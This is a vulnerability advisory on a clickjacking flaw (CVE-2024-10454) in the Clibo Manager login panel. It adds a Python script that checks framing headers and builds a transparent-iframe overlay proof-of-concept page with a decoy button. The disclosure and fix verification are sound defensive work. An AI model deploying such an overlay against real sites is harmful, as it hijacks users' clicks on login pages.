Clickjacking vulnerability in Clibo Manager

Posted date 29/10/2024
Identifier
INCIBE-2024-0536
Importance
3 - Medium
Affected Resources

Clibo Manager, version 1.1.9.12.

Description

INCIBE has coordinated the publication of one medium-severity vulnerability affecting Clibo Manager v1.1.9.12, a platform for managing the sale of season tickets and tickets and for subscriber management. The vulnerability was discovered by David Padilla Alvarado.

The vulnerability has been assigned the following CVE identifier, CVSS v3.1 base score, CVSS vector and CWE vulnerability type:

  • CVE-2024-10454: CVSS v3.1 base score 6.1 | vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | CWE-1021 (Improper Restriction of Rendered UI Layers or Frames).
Solution

The vulnerability has been fixed by the Clibo Manager team in version 1.1.9.18.

Detail

CVE-2024-10454: clickjacking vulnerability in Clibo Manager v1.1.9.12 at '/public/login', the login panel. The vulnerability occurs because the server does not send an X-Frame-Options header with the response, so a page on any other origin can load the login panel inside an iframe. An attacker could place a transparent iframe over decoy content on a site they control and hijack the victim's clicks into the framed login panel. A Content-Security-Policy frame-ancestors directive would equally prevent framing and takes precedence over X-Frame-Options in current browsers, so when verifying the fix in version 1.1.9.18, check the response for either header.
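The following is an added example, not code from Clibo Manager or from the advisory's author. It shows how to decide whether a response's headers leave a page frameable from another origin (mirroring browser precedence: CSP frame-ancestors first, then X-Frame-Options), applied to a constructed response with no framing protection beside one carrying the hardened headers, and it builds the transparent-iframe overlay page the advisory describes. The target URL, the attacker origin and the pixel offsets are assumed placeholders, not values from the product.

```python
"""Clickjacking exposure check plus the hardened response headers.

Added example for this advisory; not Clibo Manager code. The sample responses
below are constructed to illustrate the unprotected and the protected case.
"""
from html import escape

# Assumed placeholder target; the real vendor host is not given on the page.
TARGET = "https://clibo.example/public/login"


def _header(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def is_frameable(headers, attacker_origin="https://attacker.example"):
    """Return (frameable, reason) for a page embedded from attacker_origin.

    Browser behaviour, simplified: a CSP frame-ancestors directive wins over
    X-Frame-Options; host-source matching here is exact-origin only, while real
    CSP also allows scheme and wildcard host sources.
    """
    csp = _header(headers, "Content-Security-Policy")
    if csp:
        for directive in csp.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                sources = [t.strip("'").lower() for t in tokens[1:]]
                if not sources or "none" in sources:
                    return False, "CSP frame-ancestors 'none'"
                if "*" in sources or attacker_origin.lower() in sources:
                    return True, f"CSP frame-ancestors allows {attacker_origin}"
                return False, f"CSP frame-ancestors restricts to {sources}"

    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return True, "no X-Frame-Options and no CSP frame-ancestors"
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return False, f"X-Frame-Options: {value}"
    # ALLOW-FROM was dropped by browsers; an unknown or malformed value is
    # ignored entirely, which leaves the page frameable.
    return True, f"X-Frame-Options value ignored by browsers: {xfo!r}"


# Constructed: a login-page response with no framing protection, as described
# for v1.1.9.12 (only the relevant headers are shown).
VULNERABLE_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
}

# Constructed: the headers a fixed server should send. Both are set so that
# older user agents that predate frame-ancestors are still covered.
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}


def build_clickjacking_poc(target_url, left=120, top=240):
    """Build the transparent-iframe overlay page the advisory describes.

    A decoy button sits where the framed login button is expected; the iframe
    is stacked above it with opacity 0, so the victim's click lands in the
    framed page. The offsets are assumed, since the layout of /public/login is
    not given.
    """
    return f"""<!doctype html>
<html><body style="margin:0">
<button style="position:absolute;left:{left}px;top:{top}px">Claim your prize</button>
<iframe src="{escape(target_url, quote=True)}"
        style="position:absolute;left:0;top:0;width:1000px;height:800px;
               opacity:0;z-index:10;border:0"></iframe>
</body></html>"""


if __name__ == "__main__":
    for label, headers in (("vulnerable", VULNERABLE_RESPONSE),
                           ("hardened", HARDENED_RESPONSE)):
        frameable, reason = is_frameable(headers)
        print(f"{label}: frameable={frameable} ({reason})")
    print(build_clickjacking_poc(TARGET))
```

To verify a fixed deployment, capture the headers of the real /public/login response (for example from the browser's network panel) into a dict and pass it to `is_frameable`; only a result of `False` means the page can no longer be framed cross-origin. Note that the check only confirms the headers; rendering the generated overlay page in a browser confirms the fix end to end.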
